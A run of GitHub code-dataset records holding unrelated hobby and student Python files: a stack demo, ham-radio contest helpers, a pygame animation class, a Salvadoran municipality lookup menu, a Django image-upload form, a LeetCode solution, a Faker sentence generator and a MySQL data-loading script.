def peek(self): \n if 
len(self.elements) > 0:\n return self.elements[-1] \n \n def is_empty(self): \n return len(self.elements) == 0\n\nif __name__ == '__main__':\n stack = Stack()\n \n ## checking is_empty method -> true\n print(stack.is_empty())\n\n ## pushing the elements\n stack.push(1)\n stack.push(2)\n stack.push(3)\n stack.push(4)\n stack.push(5)\n\n ## again checking is_empty method -> false\n print(stack.is_empty())\n\n ## printing the topmost element of the stack -> 5\n print(stack.peek())\n\n ## popping the topmost element -> 5\n stack.pop()\n\n ## checking the topmost element using peek method -> 4\n print(stack.peek())\n\n ## popping all the elements\n stack.pop()\n stack.pop() \n stack.pop() \n stack.pop() \n\n ## checking the is_empty method for the last time -> true\n print(stack.is_empty())\n","repo_name":"karthik2265/Data-structures-and-Algorithms-Python","sub_path":"Data-Structures/stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"36999881321","text":"from rig_io.ft_tables import CA_COUNTIES \n\n############################################################################################\n\n# Routine to sift through previous contest lists to get a hint of exhcange\n# info (qth, member no. etc.)\ndef master(P,call,dx_station=None,VERBOSITY=0):\n\n if VERBOSITY>0:\n print('HINT-MASTER: call=',call,len(P.calls))\n \n # Check for DX calls\n if (call not in P.calls) and dx_station and ('/' in call):\n call=dx_station.homecall\n \n if call in P.calls:\n if VERBOSITY>0:\n print('MASTER:',call,' is in master list')\n if P.KEYING:\n h=P.KEYING.hint(call)\n try:\n print(call,'\\tmaster=',P.MASTER[call],'\\nhint=',h)\n except:\n print('HINT MASTER - I dont know what I am doing here',call)\n return h\n else:\n print('HINT.MASTER: No hints available for this contest')\n return None\n\n else:\n if VERBOSITY>0:\n print('HINT.MASTER:',call,' is NOT in master list')\n if dx_station:\n if P.contest_name=='CQWW':\n return dx_station.cqz\n return None\n\n\n# Routine to give a hint of QTH of a CA station\ndef commie_fornia(dx_station,qth):\n if dx_station.country=='United States' and dx_station.cqz==3:\n if VERBOSITY>0:\n print('Commie-fornia')\n #print CA_COUNTIES\n #hints= [s for s in CA_COUNTIES if qth in s]\n hints=[]\n n=len(qth)\n for s in CA_COUNTIES:\n if qth==s[0:n]:\n hints.append(s)\n return ' '.join(hints)\n else:\n return None\n \n# Routine to give a hint of QTH of a Canadian station\ndef oh_canada(dx_station):\n\n \"\"\" Prefixes\tProvince/Territory\n VE1 VA1\tNova Scotia\n VE2 VA2\tQuebec\t\n VE3 VA3\tOntario\t\n VE4 VA4\tManitoba\t\n VE5 VA5\tSaskatchewan\t\n VE6 VA6\tAlberta\t\n VE7 VA7\tBritish Columbia\t\n VE8\tNorthwest Territories\t\n VE9\tNew Brunswick\t\n VE0*\tInternational Waters\n VO1\tNewfoundland\n VO2\tLabrador\n VY1\tYukon\t\n VY2\tPrince Edward Island\n VY9**\tGovernment of Canada\n VY0\tNunavut\t\n CY0***\tSable Is.[16]\t\n CY9***\tSt-Paul Is.[16]\t\n\n For the CQP:\n MR Maritimes\n QC Quebec\n ON Ontario\n MB Manitoba\n SK Saskatchewan\n AB Alberta\n BC British Columbia\n NT \"\"\"\n\n # For Cali QSO Party:\n # MR = Maritime provinces plus Newfoundland and Labrador (NB, NL, NS, PE)\n CQP_VE_CALL_AREAS = ['??','MR','QC','ON','MB','SK','AB','BC','NT']\n\n if dx_station.country=='Canada':\n #if (dx_station.prefix=='VO2' or dx_station.prefix=='VY2'):\n if dx_station.prefix in ['VO2','VY2','VE9']:\n qth='MR'\n else:\n num=int( 
dx_station.call_number )\n if num>=0 and num \"FrameAnimation\":\n \"\"\"\n Load from a spritesheet.\n\n Args:\n filename: name of the spritesheet file\n image_size: size (in pixels) of the frames in the spritesheet\n colorkey: used by pygame.Surface.set_colorkey\n num_images: can be used to limit the number of images loaded\n scale: see __init__\n flip_x: see __init__\n flip_y: see __init__\n colormap: see __init__\n\n Returns:\n a new instance\n \"\"\"\n images = loading.load_spritesheet(\n filename=filename, image_size=image_size, colorkey=colorkey, num_images=num_images\n )\n return cls(images=images, scale=scale, flip_x=flip_x, flip_y=flip_y, colormap=colormap)\n\n @classmethod\n def from_images(\n cls,\n pattern: Path | str,\n colorkey=None,\n num_images: int = 0,\n scale: float = None,\n flip_x: bool = False,\n flip_y: bool = False,\n colormap: dict = None,\n ) -> \"FrameAnimation\":\n \"\"\"\n Load from a sequence of images in a folder.\n\n Args:\n pattern: glob pattern used by `load_image_sequence`\n colorkey: used by pygame.Surface.set_colorkey\n num_images: can be used to limit the number of images loaded\n scale: see __init__\n flip_x: see __init__\n flip_y: see __init__\n colormap: see __init__\n\n Returns:\n a new instance\n \"\"\"\n images = loading.load_image_sequence(\n pattern=pattern, colorkey=colorkey, num_images=num_images\n )\n return cls(images=images, scale=scale, flip_x=flip_x, flip_y=flip_y, colormap=colormap)\n\n # =================== playback ===================\n\n def play(self, n: int, repeat_frame: int = -1) -> Surface:\n \"\"\"\n Play the animation once and then continue returning the specified frame\n (default=last frame).\n\n Args:\n n: the current frame (use game tick or some other timer variable)\n repeat_frame: the frame to repeat after the animation has finished (default = last\n frame)\n\n Returns:\n the image to display\n \"\"\"\n try:\n return self[n]\n except IndexError:\n return self[repeat_frame]\n\n def loop(self, n: int) -> Surface:\n \"\"\"\n Like `play()` but if `n` is greater than the number of frames, start again at the beginning.\n\n Args:\n n: the current frame (use game tick or some other timer variable)\n\n Returns:\n the image to display\n \"\"\"\n return self.play(n % len(self))\n\n # =================== image manipulation ===================\n\n def flip(self, x=False, y=False) -> \"FrameAnimation\":\n \"\"\"\n Flip images and return a new instance.\n\n Args:\n x: flip horizontally\n y: flip vertically\n\n Returns:\n a new instance\n \"\"\"\n return self.__class__(images=self, flip_x=x, flip_y=y)\n\n def flip_in_place(self, x: bool, y: bool):\n \"\"\"\n Flip images in place.\n\n Args:\n x: flip horizontally\n y: flip vertically\n \"\"\"\n for index, image in enumerate(self):\n self[index] = manipulation.flip_image(image, flip_x=x, flip_y=y)\n\n def recolor(self, colormap: dict) -> \"FrameAnimation\":\n \"\"\"\n Like `recolor()` but returns a new instance.\n\n Args:\n colormap: mapping of old colours to new colours\n\n Returns:\n a new instance\n \"\"\"\n return self.__class__(images=self, colormap=colormap)\n\n def recolor_in_place(self, colormap: dict):\n \"\"\"\n Recolor in place.\n\n Args:\n colormap: mapping of old colours to new colours\n \"\"\"\n for index, image in enumerate(self):\n self[index] = manipulation.recolor_image(image, colormap)\n\n def scale(self, scale: float) -> \"FrameAnimation\":\n \"\"\"\n Scale images and return a new instance.\n\n Args:\n scale: factor by which to scale images\n\n Returns:\n a new 
instance\n \"\"\"\n return self.__class__(images=self, scale=scale)\n\n def scale_in_place(self, scale: float):\n \"\"\"\n Scale in place.\n\n Args:\n scale: factor by which to scale images\n \"\"\"\n for index, image in enumerate(self):\n self[index] = manipulation.scale_image(image, scale)\n","repo_name":"binnev/robingame","sub_path":"robingame/image/frame_animation.py","file_name":"frame_animation.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2053878744","text":"\r\nprint(\"\\t\\t*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~\")\r\nprint(\"\\t\\t*~ Bienvenido/a al programa *~\")\r\nprint(\"\\t\\t*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~\\n\")\r\nprint(\"Indicaciones:\\nEn este programa debera seleccionar un departamento perteneciente a El Salvador y\\nobtendra los distintos municipios pertenecientes a ese departamento\\n\")\r\n\r\n#Conjuntos de Departamentos y Municipios\r\nDepartamentos = [\"Ahuachapán\",\"Cabañas\",\"Chalatenango\",\"Cuscatlán\",\"Morazán\",\"La Libertad\",\"La Paz\",\"La Unión\",\"San Miguel\",\"San Salvador\",\"San Vicente\",\"Santa Ana\",\"Sonsonate\",\"Usulután\"]\r\nMunicipios =[[\"Apaneca\",\"Atiquizaya\",\"Concepción de Ataco\",\"El Refugio\",\"Guaymango\",\"Jujutla\",\"San Francisco Menéndez\",\"San Lorenzo\",\"San Pedro Puxtla\",\"Tacuba\",\"Turín\"],\r\n [\"Cinquera\",\"Dolores / Villa Dolores\",\"Guacotecti\",\"Ilobasco\",\"Jutiapa\",\"San Isidro\",\"Sensuntepeque\",\"Tejutepeque\",\"Victoria\"],\r\n [\"Agua Caliente\",\"Arcatao\",\"Azacualpa\",\"Chalatenango\",\"Citalá\",\"Comalapa\",\"Concepción Quezaltepeque\",\"Dulce Nombre de María\",\"El Carrizal\",\"El Paraíso\",\"La Laguna\",\"La Palma\",\"La Reina\",\"Las Vueltas\",\"Nombre de Jesús\",\"Nueva Concepción\",\"Nueva Trinidad\",\"Ojos de Agua\",\"Potonico\",\"San Antonio de la Cruz\",\"San Antonio Los Ranchos\",\"San Fernando\",\"San Francisco Lempa\",\"San Francisco Morazán\",\"San Ignacio\",\"San Isidro Labrador\",\"San José Cancasque / Cancasque\",\"San José Las Flores / Las Flores\",\"San Luis del Carmen\",\"San Miguel de Mercedes\",\"San Rafael\",\"Santa Rita\",\"Tejutla\"],\r\n [\"Candelaria\",\"Cojutepeque\",\"El Carmen\",\"El Rosario\",\"Monte San Juan\",\"Oratorio de Concepción\",\"San Bartolomé Perulapía\",\"San Cristóbal\",\"San José Guayabal\",\"San Pedro Perulapán\",\"San Rafael Cedros\",\"San Ramón\",\"Santa Cruz Analquito\",\"Santa Cruz Michapa\",\"Suchitoto\",\"Tenancingo\"],\r\n [\"Arambala\",\"Cacaopera\",\"Chilanga\",\"Corinto\",\"Delicias de Concepción\",\"El Divisadero\",\"El Rosario\",\"Gualococti\",\"Guatajiagua\",\"Joateca\",\"Jocoaitique\",\"Jocoro\",\"Lolotiquillo\",\"Meanguera\",\"Osicala\",\"Perquín\",\"San Carlos\",\"San Fernando\",\"San Francisco Gotera\",\"San Isidro\",\"San Simón\",\"Sensembra\",\"Sociedad\",\"Torola\",\"Yamabal\",\"Yoloaiquín\"],\r\n [\"Antiguo Cuscatlán\",\"Chiltiupán\",\"Ciudad Arce\",\"Colón\",\"Comasagua\",\"Huizúcar\",\"Jayaque\",\"Jicalapa\",\"La Libertad\",\"Santa Tecla\",\"Nuevo Cuscatlán\",\"San Juan Opico\",\"Quezaltepeque\",\"Sacacoyo\",\"San José Villanueva\",\"San Matías\",\"San Pablo Tacachico\",\"Talnique\",\"Tamanique\",\"Teotepeque\",\"Tepecoyo\",\"Zaragoza\"],\r\n [\"Cuyultitán\",\"El Rosario / Rosario de La Paz\",\"Jerusalén\",\"Mercedes La Ceiba\",\"Olocuilta\",\"Paraíso de Osorio\",\"San Antonio Masahuat\",\"San Emigdio\",\"San Francisco Chinameca\",\"San Juan Nonualco\",\"San Juan Talpa\",\"San Juan Tepezontes\",\"San Luis La Herradura\",\"San Luis 
Talpa\",\"San Miguel Tepezontes\",\"San Pedro Masahuat\",\"San Pedro Nonualco\",\"San Rafael Obrajuelo\",\"Santa María Ostuma\",\"Santiago Nonualco\",\"Tapalhuaca\",\"Zacatecoluca\"],\r\n [\"Anamorós\",\"Bolívar\",\"Concepción de Oriente\",\"Conchagua\",\"El Carmen\",\"El Sauce\",\"Intipucá\",\"La Unión\",\"Lilisque\",\"Meanguera del Golfo\",\"Nueva Esparta\",\"Pasaquina\",\"Polorós\",\"San Alejo\",\"San José\",\"Santa Rosa de Lima\",\"Yayantique\",\"Yucuaiquín\"],\r\n [\"Carolina\",\"Chapeltique\",\"Chinameca\",\"Chirilagua\",\"Ciudad Barrios\",\"Comacarán\",\"El Tránsito\",\"Lolotique\",\"Moncagua\",\"Nueva Guadalupe\",\"Nuevo Edén de San Juan\",\"Quelepa\",\"San Antonio del Mosco\",\"San Gerardo\",\"San Jorge\",\"San Luis de la Reina\",\"San Miguel\",\"San Rafael Oriente\",\"Sesori\",\"Uluazapa\"],\r\n [\"Aguilares\",\"Apopa\",\"Ayutuxtepeque\",\"Delgado\",\"Cuscatancingo\",\"El Paisnal\",\"Guazapa\",\"Ilopango\",\"Mejicanos\",\"Nejapa\",\"Panchimalco\",\"Rosario de Mora\",\"San Marcos\",\"San Martín\",\"San Salvador\",\"Santiago Texacuangos\",\"Santo Tomás\",\"Soyapango\",\"Tonacatepeque\"],\r\n [\"Apastepeque\",\"Guadalupe\",\"San Cayetano Istepeque\",\"San Esteban Catarina\",\"San Ildefonso\",\"San Lorenzo\",\"San Sebastián\",\"San Vicente\",\"Santa Clara\",\"Santo Domingo\",\"Tecoluca\",\"Tepetitán\",\"Verapaz\"],\r\n [\"Candelaria de la Frontera\",\"Chalchuapa\",\"Coatepeque\",\"El Congo\",\"El Porvenir\",\"Masahuat\",\"Metapán\",\"San Antonio Pajonal\",\"San Sebastián Salitrillo\",\"Santa Ana\",\"Santa Rosa Guachipilín\",\"Santiago de la Frontera\",\"Texistepeque\"],\r\n [\"Acajutla\",\"Armenia\",\"Caluco\",\"Cuisnahuat\",\"Izalco\",\"Juayúa\",\"Nahuizalco\",\"Nahulingo\",\"Salcoatitán\",\"San Antonio del Monte\",\"San Julián\",\"Santa Catarina Masahuat\",\"Santa Isabel Ishuatán\",\"Santo Domingo de Guzmán\",\"Sonsonate\",\"Sonzacate\"],\r\n [\"Alegría\",\"Berlín\",\"California\",\"Concepción Batres\",\"El Triunfo\",\"Ereguayquín\",\"Estanzuelas\",\"Jiquilisco\",\"Jucuapa\",\"Jucuarán\",\"Mercedes Umaña\",\"Nueva Granada\",\"Ozatlán\",\"Puerto El Triunfo\",\"San Agustín\",\"San Buenaventura\",\"San Dionisio\",\"San Francisco Javier\",\"Santa Elena\",\"Santa María\",\"Santiago de María\",\"Tecapán\",\"Usulután\"]]\r\n\r\n#Funcion StartProgram\r\ndef StartProgram():\r\n Start = True\r\n Reinicio = False\r\n while Departamentos:\r\n z = 0\r\n\r\n #Reinicio de programa\r\n if Reinicio == True:\r\n Start = input(\"\\nDesea consultar otro departamento -> \").lower()\r\n if Start == \"si\".lower():\r\n Start = True\r\n\r\n elif Start == \"no\".lower():\r\n break\r\n\r\n else:\r\n print(\"\\n\\t~~~ Opción no válida ~~~\")\r\n\r\n #Programa\r\n while Start == True:\r\n while z < 4 and Start == True:\r\n print(\"\\n\\tDepartamentos de El Salvador:\")\r\n\r\n #Lista y selección de departamentos\r\n x = 0\r\n for i in range(len(Departamentos)):\r\n print(f\"\\t{x+1}- {Departamentos[x]}\")\r\n x += 1\r\n\r\n Select = input(\"\\nSelecione 1 departamento -> \").lower()\r\n\r\n #Resultados de la elección del departamento\r\n if Select == \"1\" or Select == Departamentos[0].lower() or Select == \"Ahuachapan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[0]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[0])):\r\n print(f\"\\t{y + 1}- {Municipios[0][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"2\"or Select == Departamentos[1].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[1]}\")\r\n 
print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[1])):\r\n print(f\"\\t{y + 1}- {Municipios[1][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"3\"or Select == Departamentos[2].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[2]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[2])):\r\n print(f\"\\t{y + 1}- {Municipios[2][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"4\"or Select == Departamentos[3].lower() or Select == \"Cuscatlan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[3]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[3])):\r\n print(f\"\\t{y + 1}- {Municipios[3][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"5\"or Select == Departamentos[4].lower() or Select == \"Morazan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[4]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[4])):\r\n print(f\"\\t{y + 1}- {Municipios[4][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"6\"or Select == Departamentos[5].lower() or Select == \"Libertad\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[5]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[5])):\r\n print(f\"\\t{y + 1}- {Municipios[5][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"7\"or Select == Departamentos[6].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[6]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[6])):\r\n print(f\"\\t{y + 1}- {Municipios[6][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"8\"or Select == Departamentos[7].lower() or Select == \"La Union\".lower() or Select == \"Union\".lower() or Select == \"Unión\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[7]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[7])):\r\n print(f\"\\t{y + 1}- {Municipios[7][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"9\"or Select == Departamentos[8].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[8]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[8])):\r\n print(f\"\\t{y + 1}- {Municipios[8][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"10\" or Select == Departamentos[9].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[9]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[9])):\r\n print(f\"\\t{y + 1}- {Municipios[9][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"11\" or Select == Departamentos[10].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[10]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[10])):\r\n print(f\"\\t{y + 1}- {Municipios[10][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"12\" or Select == Departamentos[11].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[11]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[11])):\r\n print(f\"\\t{y + 1}- {Municipios[11][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"13\" or Select == Departamentos[12].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[12]}\")\r\n 
print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[12])):\r\n print(f\"\\t{y + 1}- {Municipios[12][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"14\" or Select == Departamentos[13].lower() or Select == \"Usulutan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[13]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[13])):\r\n print(f\"\\t{y + 1}- {Municipios[13][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n #Contador de intentos fallidos\r\n else:\r\n z += 1\r\n if z == 4:\r\n print(\"\\n\\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\") \r\n print(\"\\t~~ Demasados intentos fallidos ~~\")\r\n print(\"\\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n Reinicio = True\r\n Start = False\r\n\r\n else:\r\n print(\"\\n\\t~~~ Opción no válida ~~~\")\r\n\r\n#Inicio o fin del programa\r\nwhile Departamentos:\r\n Start = input(\"Desea iniciar el programa -> \").lower()\r\n if Start == \"si\".lower():\r\n StartProgram()\r\n break\r\n\r\n elif Start == \"no\".lower():\r\n break\r\n\r\n else:\r\n print(\"~~~ Opción no válida ~~~\")\r\n\r\nprint(\"\\nFin del programa\")","repo_name":"Ivaname99/ActividadAsincrona-Semana14","sub_path":"ActividadAsincrona - Semana 14(Grupo#5).py","file_name":"ActividadAsincrona - Semana 14(Grupo#5).py","file_ext":"py","file_size_in_byte":13209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27700435580","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\n\nfrom tower import ugettext_lazy as _lazy\n\n\nMSG_IMAGE_REQUIRED = _lazy(u'You have not selected an image to upload.')\nMSG_IMAGE_LONG = _lazy(\n u'Please keep the length of your image filename to %(max)s '\n u'characters or less. It is currently %(length)s characters.')\nMSG_IMAGE_EXTENSION = _lazy(u'Please upload an image with one of the '\n u'following extensions: jpg, jpeg, png, gif.')\nALLOWED_IMAGE_EXTENSIONS = ('jpg', 'jpeg', 'png', 'gif')\n\n\nclass ImageAttachmentUploadForm(forms.Form):\n \"\"\"Image upload form.\"\"\"\n image = forms.ImageField(error_messages={'required': MSG_IMAGE_REQUIRED,\n 'max_length': MSG_IMAGE_LONG},\n max_length=settings.MAX_FILENAME_LENGTH)\n\n def clean(self):\n c = super(ImageAttachmentUploadForm, self).clean()\n clean_image_extension(c.get('image'))\n return c\n\n\ndef clean_image_extension(form_field):\n \"\"\"Ensure only images of certain extensions can be uploaded.\"\"\"\n if form_field:\n if '.' not in form_field.name:\n raise ValidationError(MSG_IMAGE_EXTENSION)\n _, ext = form_field.name.rsplit('.', 1)\n if ext.lower() not in ALLOWED_IMAGE_EXTENSIONS:\n raise ValidationError(MSG_IMAGE_EXTENSION)\n","repo_name":"feer56/Kitsune1","sub_path":"kitsune/upload/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18249959857","text":"# 775. 
Global and Local Inversions\n# Medium\n\n# We have some permutation A of [0, 1, ..., N - 1], where N is the length of A.\n\n# The number of (global) inversions is the number of i < j with 0 <= i < j < N and A[i] > A[j].\n\n# The number of local inversions is the number of i with 0 <= i < N and A[i] > A[i+1].\n\n# Return true if and only if the number of global inversions is equal to the number of local inversions.\n\n# Example 1:\n\n# Input: A = [1,0,2]\n# Output: true\n# Explanation: There is 1 global inversion, and 1 local inversion.\n# Example 2:\n\n# Input: A = [1,2,0]\n# Output: false\n# Explanation: There are 2 global inversions, and 1 local inversion.\n# Note:\n\n# A will be a permutation of [0, 1, ..., A.length - 1].\n# A will have length in range [1, 5000].\n# The time limit for this problem has been reduced.\n\n\nclass Solution:\n    def isIdealPermutation(self, A):\n        # def isIdealPermutation(self, A: List[int]) -> bool:\n        for i in range(len(A)):\n            if not -1 <= i - A[i] <= 1:\n                return False\n        return True\n\n# class Solution:\n#     def isIdealPermutation(self, A):\n#         # def isIdealPermutation(self, A: List[int]) -> bool:\n#         return all([(i-1<=a<=i+1) for i,a in enumerate(A)])\n\n\nsolution = Solution()\n\nprint(solution.isIdealPermutation([1, 0, 2]))\nprint(solution.isIdealPermutation([1, 2, 0]))\nprint(solution.isIdealPermutation([1, 0, 3, 2, 5, 4]))\nprint(solution.isIdealPermutation([2, 1, 0]))\n","repo_name":"zduvall/algorithm-practice","sub_path":"2021-4-5-Global-And-Local-Inversion.py","file_name":"2021-4-5-Global-And-Local-Inversion.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"29409120966","text":"import random\nfrom faker import Faker\nfrom faker.providers import BaseProvider\nfrom a_novel_factory.corpora import Corpora\n\nfake = Faker()\ncorpora = Corpora()\n\n\nclass CustomSentenceProvider(BaseProvider):\n    def custom_sentence(self, characters) -> str:\n        # base texts\n        text = fake.sentence()\n        a = random.choice(corpora.activities)\n        p = random.choice(corpora.places)\n        o = random.choice(corpora.objects)\n        an = 'an' if o[0].lower() in 'aeiou' else 'a'\n        adj = random.choice(corpora.adjectives)\n\n        random_value = random.random()\n\n        if random_value < 0.5:\n            return f'{text}'\n        elif random_value < 0.8:\n            # one-character sentences\n            c = random.choice(characters)\n            return random.choice([\n                f'{c.name} said \"{text}\"',\n                f'{c.first} thought \"{text}\"',\n                f'Look at {c.first} go!',\n                f'{c.name} wept.',\n                f'{c.name} took a cab to {p}.',\n                f\"{c.prefix} {c.last}'s shoes were too tight.\",\n                f'{c.name} sang, \"{text}\"',\n                f'{c.first} was {a}.',\n                f'{c.first} asked, \"{text.rstrip(\".\")}?\"',\n                f'{c.first} was looking for {an} {o}.',\n                f'{c.first} felt {adj}.',\n            ])\n        else:\n            # two-character sentences\n            c1, c2 = random.sample(characters, k=2)\n            return random.choice([\n                f'{c1.first} greeted {c2.first}.',\n                f'{c1.name} fell in love with {c2.name}.',\n                f'{c1.name} eyed {c2.name}.',\n                f'{c1.first} asked {c2.first} for the time.',\n                f'\"{c1.prefix} {c1.last}, I presume,\" said {c2.name}.',\n                f'{c1.first} and {c2.first} were {a}.',\n                f'{c1.first} and {c2.first} moved to {p}.',\n                f'{c1.first} handed {c2.first} {an} {o}.',\n                f'{c1.first} thought {c2.first} was looking {adj}.',\n            
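    # note: these templates assume each character object exposes .first, .last, .name and .prefix\n            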
])\n","repo_name":"bensteinberg/a-novel-factory","sub_path":"a_novel_factory/providers.py","file_name":"providers.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23247546774","text":"from functools import wraps\nfrom time import time\nfrom datetime import datetime\n\nimport pymysql\nimport argparse\nimport json\nfrom json2xml import json2xml\nfrom json2xml.utils import readfromstring\n\nfrom config import local_host, user, password, db_name\n\n\ndef recreate_table_if_needed(cursor):\n \"\"\" Create tables \"\"\"\n\n cursor.execute(\"DROP TABLE IF EXISTS students\")\n cursor.execute(\"DROP TABLE IF EXISTS rooms\")\n\n create_table_rooms = \"\"\"CREATE TABLE `rooms`\n (room_id INT AUTO_INCREMENT PRIMARY KEY,\n name varchar(32));\"\"\"\n cursor.execute(create_table_rooms)\n\n create_table_students = \"\"\"CREATE TABLE `students`\n (student_id INT AUTO_INCREMENT PRIMARY KEY,\n birthday DATETIME, \n name varchar(32), \n sex varchar(32), \n room_id INT, \n FOREIGN KEY (room_id) REFERENCES rooms(room_id));\"\"\"\n cursor.execute(create_table_students)\n\n index_create_str = \"ALTER TABLE students ADD INDEX birthday (birthday)\"\n cursor.execute(index_create_str)\n\n\ndef get_rooms(name_of_file):\n with open(name_of_file, \"r\", encoding=\"utf8\") as read_file:\n rooms = json.load(read_file)\n\n return rooms\n\n\ndef load_rooms_into_table_from_file(file_rooms, cursor, connection):\n \"\"\" Insert values into 'rooms' table \"\"\"\n\n rooms = get_rooms(file_rooms)\n\n for room in rooms:\n query_string = f\"INSERT INTO rooms(name) VALUES ('{room['name']}')\"\n\n cursor.execute(query_string)\n connection.commit()\n\n return rooms\n\n\ndef get_students(name_of_file):\n with open(name_of_file, \"r\", encoding=\"utf8\") as read_file:\n students = json.load(read_file)\n\n return students\n\n\ndef load_students_into_table_from_file(file_students, cursor, connection):\n \"\"\" Insert values into 'students' table \"\"\"\n\n students = get_students(file_students)\n\n for student in students:\n birthday = datetime.strptime(student['birthday'], \"%Y-%m-%dT%H:%M:%S.%f\")\n query_string = f\"\"\"INSERT INTO students (birthday, name, sex, room_id) \n VALUES ('{birthday}', '{student['name']}', '{student['sex']}', {student['room'] + 1})\"\"\"\n\n cursor.execute(query_string)\n connection.commit()\n\n return students\n\n\ndef timing(f):\n @wraps(f)\n def wrap(*args, **kw):\n ts = time()\n result = f(*args, **kw)\n te = time()\n print(f'{(te - ts) * 1000.0} millisec')\n return result\n\n return wrap\n\n\ndef execute_query(sql_query, cursor):\n cursor.execute(sql_query)\n res = cursor.fetchall()\n\n return res\n\n\n@timing\ndef get_rooms_students_count(cursor):\n \"\"\" Select rooms list and count students in room \"\"\"\n\n query_string = \"\"\"SELECT rooms.name as 'The room number', count(rooms.room_id) as 'number of students' \n FROM rooms INNER JOIN students ON rooms.room_id = students.room_id \n GROUP BY rooms.name, rooms.room_id\"\"\"\n\n return execute_query(query_string, cursor)\n\n\n@timing\ndef get_five_smallest_age_rooms(cursor):\n \"\"\" Select top 5 rooms with the smallest average age of students \"\"\"\n\n query_string = \"\"\"SELECT rooms.name as 'The room number', CAST(AVG(YEAR(NOW()) - YEAR(students.birthday)) as float)\n as 'Average age of students' \n FROM rooms INNER JOIN students ON rooms.room_id = students.room_id \n GROUP BY rooms.name \n ORDER BY AVG(YEAR(NOW()) - 
